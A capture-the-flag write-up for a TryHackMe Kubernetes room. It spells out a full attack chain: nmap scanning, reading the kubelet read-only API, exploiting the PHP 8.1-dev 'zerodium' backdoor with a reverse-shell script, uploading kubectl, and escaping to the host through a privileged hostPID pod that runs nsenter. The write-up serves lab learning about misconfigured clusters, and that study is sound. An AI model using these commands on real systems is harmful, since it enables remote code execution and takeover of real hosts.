Frank and Herby try again...

This challenge is available in TryHackMe at https://tryhackme.com/room/frankandherbytryagain

TL;DR

  1. Scan for open ports
  2. Exploit vulnerable PHP pod
  3. Gain access to the Kubernetes control plane node

Solution

Scanning

The first step is to scan the host for open ports. We will use the following command to scan all ports, save the output, and run scripts on the open ones:

nmap -vvv IP -oA kubernetes -A -p-

We find that there are 8 open ports: 22, 10250, 10255, 10257, 10259, 16443, 25000 and 30679.

Port 22 is correctly identified as SSH; the other ports are either reported as unknown or identified with something that is not very helpful.

Looking at the Kubernetes documentation we find that, on Kubernetes control plane nodes, port 10250 corresponds to the kubelet API, port 10257 to the kube-controller-manager, and port 10259 to the kube-scheduler.

Port 30679 falls in the default NodePort range (30000-32767), so it corresponds to a service running on a worker node.

With this information, we can infer that the given IP corresponds to a machine that is simultaneously a control plane node and a worker node, that is, the same machine controls the Kubernetes cluster and runs containers.

Exploration

The Kubelet API

The kubelet API is undocumented; however, its endpoints are known. Some of them are:

/metrics -> Report kubelets own statistics
/pods    -> Information about the pods deployed on the node
/stats/  -> Statistical information for the resources in the node
/logs/   -> Logs
/exec/   -> Manage pods and containers
/run/    -> Manage pods and containers
/attach/ -> Manage pods and containers

If we try to access these endpoints on port 10250, they return Unauthorized, since we don't have a token for the kubelet API. However, port 10255 is also open, and it provides unauthenticated, read-only access to the same API. Testing the same endpoints on this port, we can obtain information only from /metrics and /pods, because the others have been disabled.
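As a quick sketch (exact responses will vary), this can be verified with curl - port 10250 serves HTTPS and rejects unauthenticated requests, while the read-only port answers over plain HTTP:

curl -k https://MACHINE_IP:10250/pods   # 401 Unauthorized
curl http://MACHINE_IP:10255/pods       # JSON dump of the pods on the node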

Parsing the JSON information we obtained from /pods (a jq one-liner for this is sketched after the list), we can see there are 4 pods running on the machine:

calico-node             
calico-kube-controllers 
coredns                 
php-deploy              
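If jq is available on our attacking machine, extracting the namespace and name of each pod from the /pods JSON is a one-liner (a sketch, assuming the standard PodList format returned by the kubelet):

curl -s http://MACHINE_IP:10255/pods | jq -r '.items[] | .metadata.namespace + "/" + .metadata.name'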

The first 3 belong to the Kubernetes cluster itself (they are in the kube-system namespace) and are not of interest to us. php-deploy, on the other hand, is in the frankland namespace and has a single container from the image vulhub/php:8.1-backdoor. On top of that, it has access to the Kubernetes API through a service account - the secrets are mounted at /var/run/secrets/kubernetes.io/serviceaccount.

This means that this pod has access to the Kubernetes API and can be our entry point.
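Those mounted secrets are just files inside the container. A quick sketch of the standard layout (we can confirm this once we have a shell in the pod):

ls /var/run/secrets/kubernetes.io/serviceaccount    # ca.crt  namespace  token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)    # bearer token for the API server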

NOTE: Ports 16443 and 25000 were not used; however, they are documented in microk8s as the API server and the cluster-agent, respectively. So this room runs the cluster on microk8s instead of plain Kubernetes, but this does not affect our exploitation, as those ports require authentication to perform any action.

The vulnerable container

If we look up the image name we found previously, we see that it is a container image with a webserver running a PHP version that was published with a backdoor: if the User-Agentt header is sent, an attacker can perform remote code execution on the website. More information about it can be found here.
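The backdoor fires when the value of the User-Agentt header starts with the string zerodium; everything after it is evaluated as PHP. A quick manual check could look like this (a sketch - MACHINE_IP and the injected command are placeholders):

curl http://MACHINE_IP:30679/ -H "User-Agentt: zerodiumsystem('id');"    # if vulnerable, the output of id appears in the response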

Using the scripts from this repo we are able to either execute any command or obtain a reverse shell.

First we need to set up our listener. We will use pwncat, since it makes uploading files easier and stabilizes our shell automatically. We run:

pwncat-cs -lp 9000

Now we need to get a reverse shell, so we will use the script from the repo, obtaining our IP with the command:

ip a show tun0

Finally, we run the script:

python3 revshell_php_8.1.0-dev.py http://MACHINE_IP:30679 OUR_IP 9000

We then land in a root shell inside the container (that seemed too easy). Taking a look around, there isn't much to see besides the previously mentioned Kubernetes secrets. In /root we can see a hidden folder, .kube, so if we upload kubectl to the container we can interact with the Kubernetes API, authenticated, since we have an API token.

Pwncat will now be very helpful, since curl and wget are not present in the container (and it doesn't have internet access), so we have to upload kubectl ourselves. We can do this by switching to the local shell with Ctrl+D and then uploading the file with the following command (assuming we have already downloaded kubectl):

upload <path to kubectl> /usr/bin

Then we need to make it executable:

chmod +x /usr/bin/kubectl

Now, we test if we can use it:

kubectl get pods

And we see the running pod (which we already have access to), so our access to the cluster is granted.

The missing policy

By default, Kubernetes doesn't allow a container in a pod to access any devices on the host. However, there is a special type of container - the privileged container - which is given access to all devices on the host. So, if we are able to run a container of this type, we can access the host filesystem.

First, we need to check if we can create new pods in the current namespace with the command:

kubectl auth can-i create pods

which tells us that we can. Let's go a step further and check if we can do everything we want in any namespace with the command:

kubectl auth can-i '*' '*'

Yes! We can do everything we want, in any namespace we want, because Frank and Herby didn't define an appropriate PodSecurityPolicy. So we are able to spawn a container that runs in privileged mode and take ownership of this cluster.
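As a side note, kubectl can also enumerate every permission granted to the current identity - useful to confirm the wildcard grant (a sketch; for this account the output should show * on *):

kubectl auth can-i --list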

To access the host we will run the following command, which can be found in HackTricks:

kubectl run r00t --restart=Never -it --image something --rm --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"vulhub/php:8.1-backdoor","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'

Let's dissect it in order to understand what is happening:

  • kubectl - well, it is obvious what it does: interact with a Kubernetes cluster
  • run r00t - start a pod named r00t
  • --restart=Never - if the pod stops, do not restart it
  • -it - allocate a TTY for the container in the pod and attach stdin to it (i.e. allows us to interact with the container)
  • --image something - here we should have the image for the pod, however since it will be overridden it can be anything
  • --rm - delete the pod after it exits
  • --overrides - inline JSON to override the generated object

Now we will take a look at the values we are overriding.

{
    "spec": {
        "hostPID": true,
        "containers": [{
            "name": "1",
            "image": "vulhub/php:8.1-backdoor",
            "command": ["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],
            "stdin": true,
            "tty":true,
            "imagePullPolicy":"IfNotPresent",
            "securityContext": {
                "privileged": true
            }
        }]
    }
}

After prettifying the override values we can see that the pod will share the host's process ID namespace (hostPID), will have one container using an image already present on the node (since the cluster has no internet access, we had to make this change), and will run in privileged mode.

The command executed when the container starts is nsenter, which allows us to run a program in a different namespace. The flag --mount=/proc/1/ns/mnt tells nsenter to enter the mount namespace (i.e. the filesystem view) of the process with PID 1, the init process. Because of the hostPID setting, that is the host's init, not the container's, so /bin/bash runs against the host filesystem - in other words, we are inside the host.
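Once the shell pops, a quick sanity check confirms we are operating on the host rather than inside the pod (a sketch - exact output will differ):

hostname    # the node's hostname, not the pod name
ls /home    # herby's home directory should be visible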

We are then dropped into a root shell again, but this time inside the host, so all we need to do is retrieve the flags from /home/herby/user.txt and /root/root.txt.
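From that root shell, reading the flags is direct:

cat /home/herby/user.txt
cat /root/root.txt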

I would like to thank kninja, the creator of this challenge; it was very challenging, but it also allowed me to learn a lot about how to move inside a misconfigured Kubernetes cluster.